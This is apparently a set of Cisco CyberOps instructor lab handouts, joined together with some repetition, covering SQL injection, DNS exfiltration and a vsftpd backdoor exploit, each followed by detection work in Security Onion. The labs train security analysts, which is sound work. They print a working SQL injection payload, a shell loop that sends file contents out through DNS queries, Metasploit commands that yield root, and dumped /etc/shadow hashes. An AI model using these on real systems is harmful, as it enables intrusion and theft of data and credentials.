h. The pcap transcript is rendered using tcpflow, and this page also provides the link to access the pcap file.
You can also search for the username information. Type Ctrl + F to open Find… dialog box. Enter
username in the field. You should be able to locate the credit card information that were displayed during
the SQL injection exploit.

Part 3: Analyzing an Data Exfiltration

As you review the ELSA logs, you noticed some strange DNS requests. Your goal is to determine if any data
was exfiltration during the exploitation.
a. If necessary, start ELSA from the Alternate Security Onion VM Desktop. If you receive the message "Your
connection is not private", click ADVANCED to continue. Click Proceed to localhost (unsafe) to
continue to the localhost. Enter username analyst and password cyberops when prompted.

b. From the ELSA queries on the left side bar, click DNS > Bottom to the left of Requests.
c. Click in the From field and select 11/11/17 as the date. Click Submit Query. This returns records for all
the DNS requests sorted so that the least frequent appear first.
d. Scroll down in the results to see a few queries for ns.example.com with a hex string as the first part of
the subdomain name. Typically, domain names are not 63-byte hexadecimal expressions. This could
signal malicious activity because users probably cannot remember a long subdomain name with random
letters and numbers.

e. Click one of the links and copy the 63-byte string prepended to ns.example.com.

f. Open a terminal window and use the echo and xxd commands to revert the hex string. The -n option
prevents the output of the trailing newline.
analyst@SecOnion:~/Desktop$ echo -n
"434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053" | xxd -r -p
CONFIDENTIAL DOCUMENT
DO NOT Sanalyst@SecOnion:~/Desktop$
If you continue to revert the hex strings, what is the result?
____________________________________________________________________________________

____________________________________________________________________________________
The result is:
CONFIDENTIAL DOCUMENT
DO NOT SHARE
This document contains information about the last security breach.
This was the content of the document that was exfiltrated using DNS.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 10 www.netacad.com
Lab – Interpret HTTP and DNS Data to Isolate Threat Actor
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Background / Scenario
MySQL is a popular database used by numerous web applications. Unfortunately, SQL injection is a common
web hacking technique. It is a code injection technique where an attacker executes malicious SQL statements
to control a web application's database server.

Domain name servers (DNS) are directories of domain names, and they translate the domain names into IP
addresses. This service can be used to exfiltrate data.
In this lab, you will perform an SQL injection to access the SQL database on the server. You will also use the
DNS service to facilitate data exfiltration.
Instructor Note: If students are not able to populate Squil and ELSA with the necessary Alert logs, it may be
necessary to have them uninstall the VMs deleting all files from Virtual Box. Then reimport the VMs.

Required Resources
 Host computer with at least 8GB of RAM and 40GB of free disk space
 Latest version of Oracle VirtualBox
 Internet connection
 Four virtual machines:

Virtual Machine RAM Disk Space Username Password

CyberOps Workstation VM 1GB 7GB analyst cyberops

Kali 1GB 10GB root cyberops
Metasploitable 512KB 8GB msfadmin msfadmin
Security Onion 3 GB 10GB analyst cyberops

Part 1: Prepare the Virtual Environment

a. Launch Oracle VirtualBox.
b. In the CyberOps Workstation window, verify that CyberOps Workstation has the correct network settings.
If necessary, select Machine > Settings > Network. Under Attached To, select Internal Network. In the
Name dropdown menu, select inside, then click OK.

c. Start the CyberOps Workstation, Kali, Metasploitable, and Security Onion virtual machines by selecting
each one of them and clicking the Start button. The Start button is located in VirtualBox’s Toolbar.
d. Log into the CyberOps Workstation virtual machine, open a terminal and configure the network by
executing the configure_as_static.sh script.
Because the script requires super-user privileges, provide the password for the user analyst.
analyst@secOps ~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] password for analyst:
Configuring the NIC as:
IP: 192.168.0.11/24
GW: 192.168.0.1

IP Configuration successful.

[analyst@secOps ~]$
e. Log into the Security Onion VM. Right-click the Desktop > Open Terminal Here. Enter sudo service
nsm status command to verify that all the servers and sensors are ready. This process could take a few
moments. Repeat the command as necessary until all the status for all the servers and sensors are OK
before moving onto the next part.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro
Name Type Host Status Pid Started
manager manager localhost running 5577 26 Jun 10:04:27
proxy proxy localhost running 5772 26 Jun 10:04:29
seconion-eth0-1 worker localhost running 6245 26 Jun 10:04:33
seconion-eth1-1 worker localhost running 6247 26 Jun 10:04:33
seconion-eth2-1 worker localhost running 6246 26 Jun 10:04:33
Status: seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>

Part 2: Investigate an SQL Injection Attack

In this part, you will perform an SQL injection to access credit card information that is stored on web server.
The Metasploitable VM is functioning as a web server configured with a MySQL database.

Step 1: Perform an SQL injection.

a. Log into Kali VM using the username root and password cyberops.

b. In the Kali VM, click the Firefox ESR icon ( ) to open a new web browser.

c. Navigate to 209.165.200.235. Click Mutillidae to access a vulnerable web site.

d. Click OWASP Top 10 > A1 – Injection > SQLi – Extract Data > User Info.

e. Right-click in the Name field and select Inspect Element (Q).

f. In the Username field, double-click the 20 and change it to 100 so you can view the longer string as you
enter the query into Name field. Close the Inspect Element when finished.

g. Enter ' union select ccid,ccnumber,ccv,expiration,null from credit_cards -- in the Name field. Click
View Account Details to extract the credit card information from the credit_cards table in owasp10 mysql
database.
Note: There is a single quote ( ' ), followed by a space at the beginning of the string. There is a space
after -- at the end of the string.

h. Scroll down the page for the results. The result indicates that you have successfully extracted the credit
card information from the database by using SQL injection. This information should only be available to
authorized users.

Step 2: Review the Sguil logs.

a. Navigate to the Security Onion VM. Double-click the Sguil icon on the Desktop. Enter the username
analyst and password cyberops when prompted.
b. Click Select All to monitor all the networks. Click Start SGUIL to continue.
c. In the Sguil console, in the bottom-right window, click Show Packet Data and Show Rule to view the
details of a selected alert.
d. Search for alerts related to ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT.
Select the alerts that start with 7. These alerts are related to seconion-eth2-1, and they are probably the
most recent alerts. Because Sguil displays real time events, the Date/Time in the screenshot is for
reference only. You should note the Date/Time of the selected alert.

e. Right-click the number under the CNT heading for the selected alert to view all the related alerts. Select
View Correlated Events.

f. Right-click an Alert ID in the results. Select Transcript to view the details for this alert.
Note: If you mistyped the user information in the previous step, you should use the last alert in the list.

g. In this window, you can see that the GET statement using the UNION operator was used to access the
credit card information. If you do not see this information, try right-clicking another of the correlated
events.
Note: If you entered the injection script more than once because of a typo or some other reason, it may
be helpful to sort the Date/Time column and view the most recent alert.

What information can you gather from the Transcript window?

h. You can also determine the information retrieved by the attacker. Click Search and enter username in
the Find: field. Use the Find button to locate the information that was captured. The same credit card
information may be displayed differently than the figure below.
Note: If you are unable to locate the stolen credit card information, you may need to view the transcript in
another alert.

k. Right-click on a TCP packet and select Follow TCP Stream.

m. At this time, you could save the Wireshark data by clicking Save As in the TCP stream window. You can
also save the Wireshark pcap file. You can also document the source and destination IP addresses and
ports, time of incident, and protocol used for further analysis by a Tier 2 analyst.
n. Close or minimize Wireshark and Squil.

Step 3: Review the ELSA logs.

The ELSA logs can also provide similar information.

a. While in the Security Onion VM, start ELSA from the Desktop. If you receive the message "Your
connection is not private", click ADVANCED to continue.

b. Click Proceed to localhost (unsafe) to continue to the localhost.

c. Log in with the username analyst and password cyberops.
d. In the left panel, select HTTP > Top Potential SQL Injection. Select 209.165.200.235.

e. Click Info on the last entry. This information is related the successful SQL injection. Notice the union
query that was used during the attack.

f. Click Plugin > getPcap. Enter username analyst and password cyberops when prompted. Click Submit
if necessary. CapMe is a web interface that allows you to get a pcap transcript and download the pcap.

g. The pcap transcript is rendered using tcpflow, and this page also provides the link to access the pcap file.
You can also search for the username information. Type Ctrl + F to open Find… dialog box. Enter
username in the field. You should be able to locate the credit card information that were displayed during
the SQL injection exploit.

Part 3: Data Exfiltration Using DNS

The CyberOps Workstation VM contains a file named confidential.txt in the
/home/analyst/lab.support.files directory. An attacker on the Kali VM will use DNS to exfiltrate the file
content from the CyberOps Workstation. The attacker has gained access to the CyberOps Workstation and
Metasploitable virtual machines. The Metasploitable virtual machine is configured as a DNS server.

Step 1: Convert a text file to a hexadecimal file.

a. On the CyberOps Workstation, navigate to /home/analyst/lab.support.files/. Verify that the
confidential.txt file is in the directory.

b. Display the content of the confidential.txt file using the more command.
c. The xxd command is used to create a hexdump or convert a hexdump back to binary. To transform the
content of confidential.txt into 60-byte long hex strings and save it to confidential.hex, use the
command xxd -p confidential.txt > confidential.hex.
The option -p is used to format the output in Postscript format and > is to redirect the output to
confidential.hex.
Note: Use the xxd man page to learn more about all the available options for the xxd command.
[analyst@secOps lab.support.files]$ xxd -p confidential.txt >
confidential.hex
d. Verify the content of confidential.hex.
[analyst@secOps lab.support.files]$ cat confidential.hex
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e
666f726d6174696f6e2061626f757420746865206c617374207365637572
697479206272656163682e0a
e. Verify that CyberOps Workstation has been configured to use the local DNS resolver at 209.165.200.235.
Enter cat /etc/resolv.conf at the prompt.
[analyst@secOps lab.support.files]$ cat /etc/resolv.conf
# Generated by resolvconf
nameserver 8.8.4.4
nameserver 209.165.200.235

Step 2: Prepend the content to DNS query log.

In this step, you will run a Bash shell for loop that will iterate through each line of the confidential.hex file
and add each line of the hex string to the name of target domain name server, ns.example.com. A DNS
query is performed on each of these new lines and will look like the following when you are done:
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053.ns.example.com
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e.ns.example.com
666f726d6174696f6e2061626f757420746865206c617374207365637572 ns.example.com
72697479206272656163682e0a ns.example.com
Within the for loop, the cat confidential.hex command is enclosed in the backticks (`) and is executed to
display the file content. Each line of hex strings in the confidential.hex file is stored temporarily in the
variable line. The content in the variable line is prepended to ns.example.com in the drill command. The
drill command is designed to get information out of DNS.
Note: The backtick can most often be found next to the 1 key on the keyboard. It is not the single quote
character, which is straight up and down.
The command must be entered exactly as shown below at the command line. This process could take
anywhere from several seconds to a few minutes. Wait for the command prompt to reappear.
[analyst@secOps lab.support.files]$ for line in `cat confidential.hex` ; do
drill $line.ns.example.com; done
;; ->>HEADER<<- opcode: QUERY, rcode: NXDOMAIN, id: 19375
;; flags: qr aa rd ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;; 434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053.ns.example.com.IN A

;; ANSWER SECTION:

;; AUTHORITY SECTION:
example.com. 604800 IN SOA ns.example. root.example.com. 2 604800 86400
2419200 604800

;; ADDITIONAL SECTION:

;; Query time: 4 msec

;; SERVER: 209.165.200.235
;; WHEN: Wed Jun 28 14:09:24 2017
;; MSG SIZE rcvd: 144
;; ->>HEADER<<- opcode: QUERY, rcode: NXDOMAIN, id: 36116
;; flags: qr aa rd ; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

<some output omitted>

Step 3: Exfiltrate the DNS query log.

At this point, the attacker on Kali can access /var/lib/bind/query.log and retrieve the data.
a. Log in to Kali, if necessary, open a Terminal, and SSH in to Metasploitable using the username user and
password user. Enter yes to continue connecting to Metasploitable when prompted. The password
prompt may take several seconds to a minute to appear.
root@kali:~# ssh [email protected]
The authenticity of host '209.165.200.235 (209.165.200.235)' can't be
established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '209.165.200.235' (RSA) to the list of known
hosts.
[email protected]'s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/
Last login: Wed Aug 30 11:24:13 2017 from 209.165.201.17
user@metasploitable:~$
b. Use the following egrep command to parse the DNS query log file, /var/lib/bind/query.log.
The command must be entered exactly as shown below at the command line.

user@metasploitable:~$ egrep -o [0-9a-f]*.ns.example.com

/var/lib/bind/query.log | cut -d. -f1 | uniq > secret.hex
 The egrep command is the same as grep -E command. This -E option allows the interpretation of
extended regular expressions.
 The -o option displays only matching portions.
 The extended regular expression, [0-9a-f]]*.ns.example.com, matches portions of the query.log
with zero or more occurrences of lowercase letters and numbers with ns.example.com as part of
the end of the string.
 The cut command removes a section from each line of the files. The cut -d. -f1 command uses the
period (.) as the delimiter to keep only the subdomain and remove the rest of the line with the Fully
Qualified Domain Name (FQDN).
 The uniq command removes any duplicates.
 The pipe (|) takes the output of the command to its left, which becomes the input to the command on
the right of the pipe. There are two pipes in the commands.
 Finally, the result is redirected to the secret.hex file.
c. Display the hex file using the cat command.
user@metasploitable:~$ cat secret.hex
434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053
484152450a5468697320646f63756d656e7420636f6e7461696e7320696e
666f726d6174696f6e2061626f757420746865206c617374207365637572
697479206272656163682e0a
The content of the file will be the same as the confidential.hex on CyberOps Workstation.
d. Exit Metasploitable SSH session.
user@metasploitable:~$ exit
logout
Connection to 209.165.200.235 closed.
e. Use the secure copy (scp) command to copy the secret.hex file from Metasploitable VM to Kali VM.
Enter user as the password when prompted. This could take few minutes.
root@kali:~# scp [email protected]:/home/user/secret.hex ~/
[email protected]'s password:
secret.hex 100% 3944 3.1MB/s 00:00
f. Verify that the file has been copied file on the Kali VM.
g. You will reverse the hex dump to display the content of the exfiltrated file, secret.hex. The xxd command
with -r -p options revert the hex dump. The result is redirected to the secret.txt file.
root@kali:~# xxd -r -p secret.hex > secret.txt
h. Verify that the content of the secret.txt file is the same as the confidential.txt file on CyberOps Workstation
VM.
root@kali:~# cat secret.txt
CONFIDENTIAL DOCUMENT
DO NOT SHARE
This document contains information about the last security breach.
i. You can now power down the CyberOps Workstation, Metasploitable, and Kali VMs.

Step 4: Analyze the DNS exfiltration.

In the previous steps, the attacker performed a DNS exfiltration using Linux tools. Now it is your job to extract
the content of the exfiltration.
a. Log in to Security Onion, start ELSA from the Desktop. If you receive the message "Your connection is
not private", click ADVANCED to continue. Click Proceed to localhost (unsafe) to continue to the
localhost. Enter username analyst and password cyberops when prompted.
b. From the ELSA queries on the left side bar, click DNS > Bottom to the left of Requests. This returns
records for all the DNS requests sorted so that the least frequent appear first. Scroll down in the results to
see a few queries for ns.example.com with a hex string as the first part of the subdomain name.
Typically, domain names are not 63-byte hexadecimal expressions. This could signal malicious activity
because users probably cannot remember a long subdomain name with random letters and numbers.

c. Click one of the links and copy the 63-byte string prepended to ns.example.com.

d. Open a terminal window and use the echo and xxd commands to revert the hex string. The -n option
prevents the output of the trailing newline.
analyst@SecOnion:~/Desktop$ echo -n
"434f4e464944454e5449414c20444f43554d454e540a444f204e4f542053" | xxd -r -p
CONFIDENTIAL DOCUMENT

DO NOT Sanalyst@SecOnion:~/Desktop$
If you continue to revert the hex strings, what is the result?
____________________________________________________________________________________
____________________________________________________________________________________
CONFIDENTIAL DOCUMENT
DO NOT SHARE
This document contains information about the last security breach.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 17 of 17 www.netacad.com
Lab – Isolated Compromised Host Using 5-Tuple (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will review logs during an exploitation of a documented vulnerability to determine the
compromised hosts and file.
Part 1: Prepare the Virtual Environment
Part 2: Review the Logs

Background / Scenario
The 5-tuple is used by IT administrators to identify requirements for creating an operational and secure
network environment. The components of the 5-tuple include a source IP address and port number,
destination IP address and port number, and the protocol in use.
In this lab, you will also review the logs to identify the compromised hosts and the content of the compromised
file.

Part 1: Prepare the Virtual Environment

seconion-eth1-1 worker localhost running 6247 26 Jun 10:04:33

seconion-eth2-1 worker localhost running 6246 26 Jun 10:04:33
Status: seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>

Part 2: Review the Logs

After the attack, the users no longer have access to the file named confidential.txt. Now you will review the
logs to determine how the file was compromised.
Note: If this was a production network, it is recommended that analyst and root users change their
passwords and comply with the current security policy.

Step 1: Review alerts in Sguil.

a. Open Sguil and log in. Click Select All and then Start SGUIL.
b. Review the Events listed in the Event Message column. Two of the messages are GPL
ATTACK_RESPONSE id check returned root. These messages indicate that root access may have
been gained during an attack. The host at 209.165.200.235 returned root access to 209.165.201.17.
Select the Show Packet Data and Show Rule checkbox to view each alert in more detail.

c. Select the returned root message that is associated with Sensor seconion-eth1-1 for further analysis. In
the figure below, Alert ID 5.5846 and its correlated event are used.

d. Right-click the number under the CNT heading to select View Correlated Events.

e. In the new tab, right-click the Alert ID for one of the GPL ATTACK_RESPONSE id check returned root
alerts and select Transcript. The Alert ID 5.5848 is used in this example.

f. Review the transcripts for all the alerts. The latest alert in the tab is likely to display the transactions
between the threat actor and the target during the attack.

What had happened during the attack?

Step 2: Pivot to Wireshark.

a. Select the alert that provided you with the transcript from the previous step. Right-click the Alert ID and
select Wireshark.

b. To view all packets assembled in a TCP conversation, right-click any packet and select Follow TCP
Stream.

The TCP stream shows the transaction between the threat actor displayed in red text and the target in
blue text. The information from the TCP stream is the same as in the transcript.
c. Exit the TCP stream window. Close Wireshark when you are done reviewing the information provided by
Wireshark.

Step 3: Use ELSA to pivot to the Bro Logs.

a. Return to Sguil. Right-click either the source or destination IP for the same GPL ATTACK_RESPONSE
id check returned root alert and select ELSA IP Lookup > DstIP. Enter username analyst and
password cyberops when prompted by ELSA.
Note: If you received the message "Your connection is not private", click ADVANCED > Proceed to
localhost (unsafe) to continue.

b. Change the date in the From field to the date before the date displayed in Sguil. Click Submit Query.
c. Click bro_notice.

d. The result indicates that 209.165.201.17 was performing a port scan on 209.165.200.235. The attacker
probably found vulnerabilities on 209.165.200.235 to gain access.

e. If an attacker has compromised 209.165.200.235, you want to determine the exploit that was used and
what was accessed by the attacker.

Step 4: Return to Squil to investigate attack.

a. Navigate to Sguil and click the RealTime Events tab. Locate the ET EXLOIT VSFTPD Backdoor User
Login Smiley events. These events are possible exploits and occurred within the timeframe of
unauthorized root access.

b. Right-click the number under the CNT heading and select View Correlated Events to view all the related
events. Select the Alert ID that starts with 5. This alert gathered the information from sensor on seconion-
eth1-1 interface.

c. In the new tab with all the correlated events, right-click the Alert ID and select Transcript to view each
alert in more detail. The latest alert is likely to display the TCP transmission between the attacker and
victim.

d. You can also right-click the Alert ID and select Wireshark to review and save the pcap file and TCP
stream.

Step 5: Use ELSA to view exfiltrated data.

a. To use ELSA for more information about the same alert as above, right-click either the source or
destination IP address and select ELSA IP Lookup > DstIP.
b. Change the date in the From field to before the event occurred as indicated by the timestamp in Sguil.

c. Click bro_ftp to view ELSA logs that are related to FTP.

Which file was transferred via FTP to 209.165.200.235? Whose account was used to transfer the file?
____________________________________________________________________________________
The file confidential.txt was transferred by the user analyst.
d. Click info to view the transactions in the last record. The reply_msg field indicates that this is the last
entry for the transfer of the confidential.txt file. Click Plugin > getPcap. Enter username analyst and
password cyberops when prompted. Click Submit if necessary.

The pcap transcript is rendered using tcpflow, and this page also provides the link to access the pcap file.

e. To determine the content of the file that was compromised, open ELSA by double clicking the icon on the
Desktop to open a new tab and perform a new search.
f. Expand FTP and click FTP Data.
g. Change the date in the From field as necessary to include the time period of interest, and click Submit
Query.
h. Click one of the Info links and select getPcap from the dropdown menu to determine the content of the
stolen file.

i. The result displays the content of the file named confidential.txt that was transferred to the FTP server.

Step 6: Clean up
Shut down the VM when finished.

Reflection
In this lab, you have reviewed the logs as a cybersecurity analyst. Now summarize your findings.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
From the Sguil and ELSA logs, it was determined that an attacker at 209.165.201.17 exploited the vsftpd
vulnerability to gain root access to 209.165.200.235. By using root access gained from the attack, the attacker
had added a new root user myroot for future root access. The attacker compromised the user analyst to gain
to access an internal workstation, 192.168.0.11. By using the analyst account, the attacker was able to gain
access to the file named confidential.txt and transfer the file using FTP to 209.165.200.235, where the
attacker has remote access to retrieve the file.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 10 of 10 www.netacad.com
Lab – Isolated Compromised Host Using 5-Tuple (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Topology

Background / Scenario
The 5-tuple is used by IT administrators to identify requirements for creating an operational and secure
network environment. The components of the 5-tuple include a source IP address and port number,
destination IP address and port number, and the protocol in use.
In this lab, you will exploit a vulnerable server using known exploits. You will also review the logs to determine
the compromised hosts and file.

Required Resources
 Host computer with at least 8 GB of RAM and 35 GB of free disk space
 Latest version of Oracle VirtualBox
 Internet connection
 Four virtual machines:

Virtual Machine RAM Disk Space Username Password

CyberOps Workstation VM 1GB 7GB analyst cyberops

Kali 1GB 10GB root cyberops
Metasploitable 512KB 8GB msfadmin msfadmin
Security Onion 3 GB 10GB analyst cyberops

Part 1: Prepare the Virtual Environment

a. Launch Oracle VirtualBox.
b. In the CyberOps Workstation window, verify that the Network set to Internal Network. Select Machine >
Settings > Network. Under Attached To, select Internal Network. In the dropdown menu next to Name,
select inside, then click OK.

c. Launch and log into CyberOps Workstation, Kali, Metasploitable, and Security Onion virtual machines.
d. In the CyberOps Workstation VM, open a terminal and configure the network by executing the
configure_as_static.sh script.
Because the script requires super-user privileges, provide the password for the user analyst.
[analyst@secOps~]$ sudo ./lab.support.files/scripts/configure_as_static.sh
[sudo] password for analyst:
Configuring the NIC as:
IP: 192.168.0.11/24
GW: 192.168.0.1

IP Configuration successful.
[analyst@secOps ~]$
e. In the Security Onion VM, right-click the Desktop > Open Terminal Here. Enter the sudo service nsm
status command to verify that all the servers and sensors are ready. This process could take a few
moments. If some services report FAIL, repeat the command as necessary until all the statuses are OK
before moving on to the next part.
analyst@SecOnion:~/Desktop$ sudo service nsm status
Status: securityonion
* sguil server [ OK ]
Status: HIDS
* ossec_agent (sguil) [ OK ]
Status: Bro
Name Type Host Status Pid Started
manager manager localhost running 5577 26 Jun 10:04:27
proxy proxy localhost running 5772 26 Jun 10:04:29
seconion-eth0-1 worker localhost running 6245 26 Jun 10:04:33
seconion-eth1-1 worker localhost running 6247 26 Jun 10:04:33
seconion-eth2-1 worker localhost running 6246 26 Jun 10:04:33
Status: seconion-eth0
* netsniff-ng (full packet data) [ OK ]
* pcap_agent (sguil) [ OK ]
* snort_agent-1 (sguil) [ OK ]
* snort-1 (alert data) [ OK ]
* barnyard2-1 (spooler, unified2 format) [ OK ]
<output omitted>

Part 2: Reconnaissance
In this part, you will use nmap to determine if the Metasploitable VM has a vulnerability associated with
vsftpd version 2.3.4.
a. In the Security Onion VM, enter date to display the date and time.
analyst@SecOnion:~/Desktop$ date
Record your date and time.
____________________________________________________________________________________
Answers will vary.
b. In the Kali VM, right-click the Desktop and select Open Terminal.

c. Using nmap options, you will use a script to test for an FTP vulnerability on the Metasploitable VM at
209.165.200.235. Enter the following command:
root@kali:~# nmap --script ftp-vsftpd-backdoor 209.165.200.235 –-reason >
ftpd.txt
The results are redirected and saved to the text file ftpd.txt. This process will take a few moments.
d. When the prompt returns, open the text file containing the nmap results.
root@kali:~# cat ftpd.txt
The result lists the vsftpd vulnerability and other open ports that are detected by nmap on the
Metasploitable VM. In this lab, you will exploit the vulnerability with port 21.
Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-11 11:34 EDT
Nmap scan report for 209.165.200.235
Host is up, received echo-reply ttl 63 (0.0011s latency).
Not shown: 977 closed ports
Reason: 977 resets
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
|tate: VULNERABLE (Exploitable)
|IDs: OSVDB:73573 CVE:CVE-2011-2523
|vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|Disclosure date: 2011-07-03
|Exploit results:
|Shell command: id
|Results: uid=0(root) gid=0(root)
|References:
|http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|http://osvdb.org/73573
<output omitted>

Part 3: Exploitation
Now you have determined that you could gain root access to the Metasploitable VM, you will exploit the vsftp
vulnerability to gain full control of the Metasploitable VM. You will compromise the /etc/shadow file so you
may gain access to other hosts in the network.

Step 1: Set up the exploit.

In this step, you will use Metasploit Framework to launch the exploit against the Metasploitable VM using
vsftpd. The Metasploit Framework is a tool for developing and launching attacks against a remote target
host. It can be also used to test the vulnerability of a host.
a. In a terminal on the Kali VM, enter msfconsole at the prompt to start the Metasploit Framework. This will
take a few moments.
root@kali:~# msfconsole

b. At the msf prompt, enter search vsftpd to search for the module that is associated with the VSFTPD
v2.3.4 backdoor. You will use this module for exploitation. This search will take a few moments when
building the database for the first time.
msf > search vsftpd
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name Disclosure Date Rank Description

---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4
Backdoor Command Execution
c. The exploit has been found. Enter the following command at the prompt to use the vsftp backdoor
exploit.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
d. From the exploit prompt, set the target host to the Metasploitable VM.
msf exploit(vsftpd_234_backdoor) > set rhost 209.165.200.235
rhost => 209.165.200.235
e. Verify the exploit setup. Enter show options at the prompt.
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 209.165.200.235 yes The target address
RPORT 21 yes The target port (TCP)

Exploit target:
Id Name-- ----
0 Automatic

Step 2: Execute the exploit.

Now you will use the vsftpd exploit to gain root access to the Metaspoitable VM.
a. At the prompt, enter the exploit command to execute the exploit.
msf exploit(vsftpd_234_backdoor) > exploit

[*] 209.165.200.235:21 - Banner: 220 (vsFTPd 2.3.4)

[*] 209.165.200.235:21 - USER: 331 Please specify the password.
[+] 209.165.200.235:21 - Backdoor service has been spawned, handling...
[+] 209.165.200.235:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (209.165.201.17:33985 ->
209.165.200.235:6200) at 2017-07-11 11:53:35 -0400
<No system prompt displays>

b. This enters the Metasploit Framework terminal and you now have root access to the Metasploitable VM
from the Kali host. Notice that there is no system prompt presented. To verify that you have root access to
Metasploitable VM, enter whoami.
whoami
What is the current username? __________________________________ root
c. Enter hostname to verify name of the host.
hostname
What is the hostname? _______________________________________ metasploitable
d. The IP address of the Metasploit VM is 209.165.200.235. Enter ifconfig to verify the IP address on the
current host.
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:15:91:86
inet addr:209.165.200.235 Bcast:209.165.200.255 Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:fe15:9186/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:78058 errors:2 dropped:0 overruns:0 frame:0
TX packets:195672 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:11803523 (11.2 MB) TX bytes:91415071 (87.1 MB)
Interrupt:10 Base address:0xd020

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1048 errors:0 dropped:0 overruns:0 frame:0
TX packets:1048 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:450261 (439.7 KB) TX bytes:450261 (439.7 KB)
e. To gain full control of the Metasploitable VM, begin by displaying the content of the /etc/shadow file. The
/etc/shadow file stores the password information in an encrypted format for the system's accounts along
with optional aging information.
Enter the cat /etc/shadow command to display the content.
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
<some output omitted>
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::

service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
analyst:$1$uvEqE7eT$x6gczc318aD6mhxOFZqXE.:17338:0:99999:7:::
f. Highlight the content of /etc/shadow and right-click the highlighted content and select Copy.
g. Open a new terminal in the Kali VM, and start the nano text editor. Enter nano /root/shadow.txt at the
prompt.
root@kali:~# nano /root/shadow.txt
h. Right-click the blank space in nano and select Paste. After you have pasted the content, remove any
blank lines at the bottom, if necessary. Enter Ctl-X to save and exit nano. Press y when asked to save
the file and accept the filename shadow.txt.
This saved /root/shadow.txt file will be used in a later step with John the Ripper to crack the passwords
of some of the login names so you can access the system remotely via SSH.
i. In the same terminal, enter the cat command and grep to display only the details for the root user.
root@kali@~# cat /root/shadow.txt | grep root
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
Notice that the colons (:) separate each line into 9 fields. Using the root user account as an example, root
is the login name and $1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. is the encrypted password. The next 6
